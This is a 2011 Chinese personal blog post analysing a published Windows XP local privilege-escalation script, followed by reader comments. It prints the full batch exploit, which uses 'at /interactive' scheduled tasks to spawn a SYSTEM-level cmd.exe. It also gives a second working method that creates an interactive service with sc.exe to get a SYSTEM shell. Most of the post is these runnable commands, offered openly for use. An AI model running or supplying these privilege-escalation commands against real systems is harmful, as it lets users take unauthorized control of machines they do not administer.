关于最近出的xp本地system提权脚本研究

2011-6-22 王健宇

在看到这个脚本以后便明白了,其实这也算不上什么0day,只是利用任务计划而已。

同样我们还可以利用其他方式来提升到system权限,如:系统启动服务项也是system权限,按某些快捷键启动的也是system权限。

如代码:

sc Create xiaoyu binPath= "cmd /c start cmd" type= own type= interact start= auto

net start xiaoyu

点击查看原图

成功执行出CMD以后同样是system权限,执行完毕以后可以用sc delete xiaoyu删除系统服务,当然这个我们也可以指定执行什么文件,但是拿来提权就不怎么好了,试想SC.EXE或者AT.EXE的权限都没有还怎么利用这些0day了?所以说这些都算不上什么0day,充其量只是利用系统正常功能而已。

最近公布的代码为:

@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y

echo [*] Backup time
time < time.txt
执行以后会打开3个资源管理器和CMD,此方法只有在计划任务服务启动且%windir%\system32\at.exe文件有权限的情况下才能执行成功。

标签: xp本地system提权脚本 系统服务提权

评论:

拼购
2011-06-29 11:04
不说文章 直说博主的博客哈这是我看到的第二个情侣博客 很不错 很烂漫 顶一个
江南夜色
2011-06-27 21:32
不错。支持了。小伙子 你博客玉米PR3啦
王健宇
2011-06-28 14:10
@江南夜色:哈哈。不知不觉PR3了,不是说不更新了吗?
kushao
2011-06-22 09:31
有个windows 内核溢出的那个不错,直接爆管理员权限。
王健宇
2011-06-22 09:32
@kushao:最近出了一个2003/2008的,可惜自己不会挖,每次都得等别人发唉
Helen
2011-06-22 09:18
这个其实我早就知道了,只是不想公开而已,其实也没啥技术含量的,没想到被你公开了,哈哈,笑而不语……
王健宇
2011-06-22 09:19
@Helen:我也是早知道了,只是看到连计划任务都能作为0day发,我也发一下其他的而已

发表评论:

Powered by emlog sitemap